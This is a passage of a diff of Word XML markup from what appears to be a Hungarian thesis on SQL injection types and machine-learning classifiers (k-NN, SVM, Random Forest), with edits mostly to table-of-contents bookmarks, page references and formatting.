+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158214 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>23</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TJ2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="880"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
+            </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+              <w:lang w:val="hu-HU"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc72158215" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:noProof/>
-              </w:rPr>
-              <w:t>4.</w:t>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>4.1.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3389,8 +3518,9 @@
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:noProof/>
-              </w:rPr>
-              <w:t>EREDMÉNY ÉS ANALÍZIS</w:t>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>Követelménymegvalósítás</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3411,7 +3541,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc72008750 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158215 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3432,6 +3562,192 @@
                 <w:webHidden/>
               </w:rPr>
               <w:t>23</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TJ2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="880"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
+            </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+              <w:lang w:val="hu-HU"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc72158216" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>4.2.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>Erőforrás- és pontosságoptimalizálás</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158216 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>24</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TJ2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="880"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
+            </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+              <w:lang w:val="hu-HU"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc72158217" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>4.3.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>Összefoglalás</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158217 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>25</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3457,7 +3773,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc72008751" w:history="1">
+          <w:hyperlink w:anchor="_Toc72158218" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -3485,7 +3801,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc72008751 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158218 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3531,7 +3847,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc72008752" w:history="1">
+          <w:hyperlink w:anchor="_Toc72158219" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -3559,7 +3875,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc72008752 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158219 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3596,7 +3912,6 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -3605,7 +3920,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc72008753" w:history="1">
+          <w:hyperlink w:anchor="_Toc72158220" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -3633,7 +3948,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc72008753 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158220 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3654,80 +3969,6 @@
                 <w:webHidden/>
               </w:rPr>
               <w:t>29</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TJ2"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
-            </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
-            <w:rPr>
-              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:noProof/>
-              <w:sz w:val="22"/>
-              <w:szCs w:val="22"/>
-              <w:lang w:val="hu-HU"/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc72008754" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:noProof/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>Mellékletek</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc72008754 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>30</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3758,20 +3999,6 @@
     </w:sdt>
     <w:p>
       <w:pPr>
-        <w:spacing w:line="259" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
@@ -3788,7 +4015,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc72008733"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc72158197"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4108,7 +4335,7 @@
         </w:numPr>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc72008734"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc72158198"/>
       <w:r>
         <w:t>SQL INJECTION</w:t>
       </w:r>
@@ -4604,7 +4831,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc72008735"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc72158199"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4630,7 +4857,7 @@
         <w:pStyle w:val="Stlus3"/>
         <w:ind w:left="709" w:hanging="709"/>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc72008736"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc72158200"/>
       <w:r>
         <w:t>Sávon belüli</w:t>
       </w:r>
@@ -5466,7 +5693,7 @@
         <w:pStyle w:val="Stlus3"/>
         <w:ind w:left="709" w:hanging="709"/>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc72008737"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc72158201"/>
       <w:r>
         <w:t>Vak (</w:t>
       </w:r>
@@ -6196,7 +6423,7 @@
         <w:pStyle w:val="Stlus3"/>
         <w:ind w:left="709" w:hanging="709"/>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc72008738"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc72158202"/>
       <w:r>
         <w:t>Sávon kívüli (</w:t>
       </w:r>
@@ -6572,7 +6799,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc72008739"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc72158203"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6606,6 +6833,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Az SQL injekciós </w:t>
       </w:r>
       <w:r>
@@ -7035,7 +7263,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>, hogy a tárolt eljárás SQL-kódját meghatározzák</w:t>
+        <w:t xml:space="preserve">, hogy a tárolt eljárás </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>SQL-kódját meghatározzák</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7102,7 +7337,6 @@
           <w:noProof/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3073BAED" wp14:editId="5AD59E53">
             <wp:extent cx="4267419" cy="1155759"/>
@@ -7682,7 +7916,7 @@
         </w:numPr>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc72008740"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc72158204"/>
       <w:r>
         <w:t>GÉPI TANULÁS</w:t>
       </w:r>
@@ -7956,7 +8190,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc72008741"/>
+      <w:bookmarkStart w:id="13" w:name="_Toc72158205"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -8404,6 +8638,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Az algoritmus típusa többek között függ a képzési adatkészlet típusától, az adatok mennyiségétől, valamint a megoldandó probléma típusától.</w:t>
       </w:r>
       <w:r>
@@ -8452,14 +8687,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">ének </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>mérése</w:t>
+        <w:t>ének mérése</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9128,14 +9356,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> regresszió (regression). Míg az osztályozás célja, hogy megjósolja azt a kategóriát, amelyhez az adatok tartoznak, addig a regresszió számértéket jósol a korábban megfigyelt adatok alapján. Ez egy példán keresztül könnyedén megérthető: az osztályozás a „Holnap meleg lesz vagy hideg?” kérdésre </w:t>
+        <w:t xml:space="preserve"> regresszió </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">válaszol, a regresszió pedig a „Milyen idő lesz holnap?”. A program kérdésköre az osztályozáshoz tartozik, így </w:t>
+        <w:t xml:space="preserve">(regression). Míg az osztályozás célja, hogy megjósolja azt a kategóriát, amelyhez az adatok tartoznak, addig a regresszió számértéket jósol a korábban megfigyelt adatok alapján. Ez egy példán keresztül könnyedén megérthető: az osztályozás a „Holnap meleg lesz vagy hideg?” kérdésre válaszol, a regresszió pedig a „Milyen idő lesz holnap?”. A program kérdésköre az osztályozáshoz tartozik, így </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9170,7 +9398,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="_Toc72008742"/>
+      <w:bookmarkStart w:id="14" w:name="_Toc72158206"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -9323,7 +9551,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc72008743"/>
+      <w:bookmarkStart w:id="15" w:name="_Toc72158207"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -10284,7 +10512,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="_Toc72008744"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc72158208"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -10329,6 +10557,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>A K-NN algoritmus az egyik legegyszerűbb osztályozási algoritmus,</w:t>
       </w:r>
       <w:r>
@@ -10401,14 +10630,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">-es ábra többek között szemlélteti, amikor a 3 legközelebbi szomszéd közül 2 db (67%) tartozik az 1-es osztályba és csak 1 db (33%) a 0-ás osztályba. Ekkor az algoritmus az 1-eshez rendeli az </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>új esetet.</w:t>
+        <w:t>-es ábra többek között szemlélteti, amikor a 3 legközelebbi szomszéd közül 2 db (67%) tartozik az 1-es osztályba és csak 1 db (33%) a 0-ás osztályba. Ekkor az algoritmus az 1-eshez rendeli az új esetet.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11348,7 +11570,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="_Toc72008745"/>
+      <w:bookmarkStart w:id="17" w:name="_Toc72158209"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -11562,6 +11784,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">(hyperplane) </w:t>
       </w:r>
       <w:r>
@@ -11686,7 +11909,6 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Az optimális sík megtalálása </w:t>
       </w:r>
       <w:r>
@@ -12396,7 +12618,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="18" w:name="_Toc72008746"/>
+      <w:bookmarkStart w:id="18" w:name="_Toc72158210"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -13262,7 +13484,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="_Toc72008747"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc72158211"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -13456,6 +13678,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>A Random Forest osztályozás egy, az együttes tanulási módszerek közül</w:t>
       </w:r>
       <w:r>
@@ -13492,14 +13715,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">z egyes csomópontokban felosztható funkciók száma a teljes érték bizonyos százalékára korlátozódik (ami hiperparaméter néven ismert). Ez biztosítja, hogy az együttes modell ne támaszkodjon túlzottan egyetlen egyedi tulajdonságra sem és felhasználja az összes </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>potenciálisan prediktív tulajdonságot.</w:t>
+        <w:t>z egyes csomópontokban felosztható funkciók száma a teljes érték bizonyos százalékára korlátozódik (ami hiperparaméter néven ismert). Ez biztosítja, hogy az együttes modell ne támaszkodjon túlzottan egyetlen egyedi tulajdonságra sem és felhasználja az összes potenciálisan prediktív tulajdonságot.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13546,7 +13762,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-     